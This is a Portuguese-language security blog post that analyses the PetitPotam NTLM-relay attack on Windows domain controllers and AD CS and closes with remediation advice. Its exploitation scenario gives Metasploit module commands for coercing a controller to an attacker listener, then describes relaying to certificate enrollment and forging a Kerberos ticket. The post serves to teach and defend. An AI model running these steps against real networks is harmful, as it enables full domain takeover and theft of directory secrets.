CVE-2021-36942 – PetitPotam | Coerção de Autenticação para NTLM Relay


PetitPotam (CVE-2021-36942): Coerção de Autenticação para NTLM Relay

Análise tecnica

PetitPotam não é uma vulnerabilidade de execução de código direta, mas uma falha lógica que permite a coerção de autenticação. Ele explora o protocolo Encrypting File System Remote (EFSRPC). Um atacante pode enviar uma chamada RPC EfsRpcOpenFileRaw para um servidor Windows (como um Controlador de Domínio), instruindo-o a se conectar a um caminho UNC especificado pelo atacante (ex: \IP_ATACANTEshare).

Isso força o DC a iniciar uma autenticação NTLM para a máquina do atacante. O perigo real surge quando combinado com ataques de NTLM Relay. Se o atacante retransmitir essa autenticação para um serviço que aceita NTLM e não requer assinatura (como o Active Directory Certificate Services – AD CS Web Enrollment), ele pode obter um certificado digital válido para o DC, permitindo a personificação completa do Controlador de Domínio e a extração de todos os segredos do AD.

Mapeamento e Exploração com Metasploit

  • Módulo: auxiliary/scanner/smb/impacket/petitpotam
  • Integração: Funciona em conjunto com módulos de captura ou ferramentas externas como ntlmrelayx.

Cenário de Exploração Detalhado:

  1. Configuração do Relay:
    O atacante configura um servidor de relay (usando ferramentas externas integradas ou via proxy socks no Metasploit) apontando para o servidor AD CS da empresa (http://ca.empresa.local/certsrv).
  2. Coerção:
    Bash
    msf6 > use auxiliary/scanner/smb/impacket/petitpotam
    msf6 auxiliary(petitpotam) > set RHOSTS 192.168.10.5 (IP do DC)
    msf6 auxiliary(petitpotam) > set LHOST 192.168.10.50 (IP do Atacante/Listener)
    msf6 auxiliary(petitpotam) > run

     

  3. Resultado:
    O DC conecta-se ao IP do atacante. A autenticação é retransmitida para o AD CS. O AD CS emite um certificado Base64. O atacante usa esse certificado com ferramentas como Rubeus ou PKINIT tools para solicitar um Ticket Kerberos (TGT) para a conta do DC, assumindo controle total.40

Remediação e Defesa em Profundidade

  1. Desativação de NTLM no AD CS: A solução definitiva é desativar a autenticação NTLM nos serviços IIS do AD CS, exigindo Kerberos. Isso quebra o NTLM Relay.
  2. Extended Protection for Authentication (EPA): Habilitar EPA no IIS do AD CS para vincular a autenticação ao canal TLS, prevenindo relay.41
  3. Patching: A Microsoft lançou patches para bloquear a chamada EFSRPC anônima, mas variantes autenticadas ainda funcionam, tornando a configuração do AD CS a defesa primária.

Filtros RPC: Bloquear tráfego RPC para a interface EFSRPC em firewalls de host.

No responses yet

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

CVE-2022-26923 – Certifried | Elevação de Privilégio via Atributos de Máquina

CVE-2022-26923 – Certifried | Elevação de Privilégio via Atributos de Máquina

Esta vulnerabilidade permite que qualquer usuário autenticado (que por padrão pode criar até 10 contas de máquina no AD[…]

Nmap, Pentest & PTES

Nmap, Pentest & PTES

A segurança de infraestruturas corporativas modernas depende intrinsecamente da capacidade de auditoria contínua e da validação rigorosa dos controles[…]

AD CS - ESC8: NTLM Relay via Web Enrollment

Active Directory Certificate Services – ESC8 | NTLM Relay via Web Enrollment

ESC8 não é uma falha de template, mas uma falha de configuração de serviço.